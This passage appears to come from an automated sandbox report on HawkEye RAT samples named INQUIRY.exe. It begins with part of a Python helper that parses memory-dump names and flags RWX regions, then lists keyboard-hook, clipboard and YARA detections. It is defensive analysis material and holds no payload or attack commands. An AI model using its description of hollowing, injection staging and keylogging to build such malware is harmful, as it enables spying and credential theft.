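    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<rtype>[0-9A-Fa-f]{8})\.sdmp"
)
# <proc index>.<stage>.<image>.<base address>.<n>[.raw].unpack  (decimal index and stage)
UNPACK_RE = re.compile(
    r"(?P<proc>\d+)\.(?P<stage>\d+)\.(?P<image>[^.\s]+\.exe)\."
    r"(?P<base>[0-9A-Fa-f]+)\.(?P<idx>\d+)\.(?:raw\.)?unpack"
)


@dataclass(frozen=True)
class Region:
    proc: int
    stage: int            # 1 = dump taken at process start, 2 = at end of analysis
    base: int
    prot: Optional[int]   # None for unpack identifiers, which carry no protection field
    kind: str             # "MEMORY" or "UNPACKEDPE"


def parse_source(line: str) -> Optional[Region]:
    """Return the Region referenced by a 'Source: ...' line, or None if it names no dump."""
    m = SDMP_RE.search(line)
    if m:
        return Region(int(m["proc"], 16), int(m["stage"], 16), int(m["base"], 16),
                      int(m["prot"], 16), "MEMORY")
    m = UNPACK_RE.search(line)
    if m:
        return Region(int(m["proc"]), int(m["stage"]), int(m["base"], 16), None, "UNPACKEDPE")
    return None


def in_image(base: int) -> bool:
    return IMAGE_BASE <= base < IMAGE_BASE + IMAGE_SIZE


def summarize(lines):
    """Per process: distinct matched regions, stages seen, protections, RWX regions, and
    RWX hits outside the image range (unpacking/injection buffers rather than the payload)."""
    per_proc = defaultdict(set)
    for line in lines:
        r = parse_source(line)
        if r is not None:
            per_proc[r.proc].add(r)
    report = {}
    for proc, regions in sorted(per_proc.items()):
        rwx = sorted(r.base for r in regions if r.prot == PAGE_EXECUTE_READWRITE)
        report[proc] = {
            "regions": len(regions),
            "stages": sorted({r.stage for r in regions}),
            "protections": sorted({PROTECT_NAMES.get(r.prot, hex(r.prot))
                                   for r in regions if r.prot is not None}),
            "rwx_bases": rwx,
            "rwx_outside_image": [hex(b) for b in rwx if not in_image(b)],
        }
    return report


# Constructed input: a handful of the match lines from this report.
SAMPLE = """\
Source: Yara match; File source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY
""".splitlines()

if __name__ == "__main__":
    for proc, info in summarize(SAMPLE).items():
        print(f"process {proc}: {info}")
```

Run against the full list, the output shows the same pattern the report's signatures describe: the 0x400000 region of every hollowed INQUIRY.exe instance is executable and writable and matches HawkEye, and each instance also carries RWX hits in private allocations well away from the image base, which is where the unpacked payload is staged before injection.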
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs; .Net Code: HookKeyboard
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs; .Net Code: HookKeyboard
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs; .Net Code: HookKeyboard
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs; .Net Code: HookKeyboard
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs; .Net Code: HookKeyboard
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs; .Net Code: HookKeyboard
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs; .Net Code: HookKeyboard
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs; .Net Code: HookKeyboard
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs; .Net Code: HookKeyboard
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs; .Net Code: HookKeyboard
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs; .Net Code: HookKeyboard
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs; .Net Code: HookKeyboard
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\INQUIRY.exe; Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\INQUIRY.exe (8 identical entries)
                    Source: C:\Users\user\Desktop\INQUIRY.exe; Code function: 0_2_004070D2 OpenClipboard, (2 identical entries)
                    Source: C:\Users\user\Desktop\INQUIRY.exe; Code function: 0_2_004233B4 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader, (2 identical entries)
                    Source: C:\Users\user\Desktop\INQUIRY.exe; Code function: 2_2_004239F8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, (2 identical entries)
                    Source: C:\Users\user\Desktop\INQUIRY.exe; Code function: 0_2_00459724 GetKeyboardState,SetKeyboardState,SendMessageA,SendMessageA, (2 identical entries)
                    Source: C:\Users\user\Desktop\INQUIRY.exe; Window created: window name: CLIPBRDWNDCLASS (8 identical entries)
                    Source: Yara match; File source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: INQUIRY.exe PID: 5896, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: INQUIRY.exe PID: 6076, type: MEMORY

                    System Summary:

                    Malicious sample detected (through community Yara rule)
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPED; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPED; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPED; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPED; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPED; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPED; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
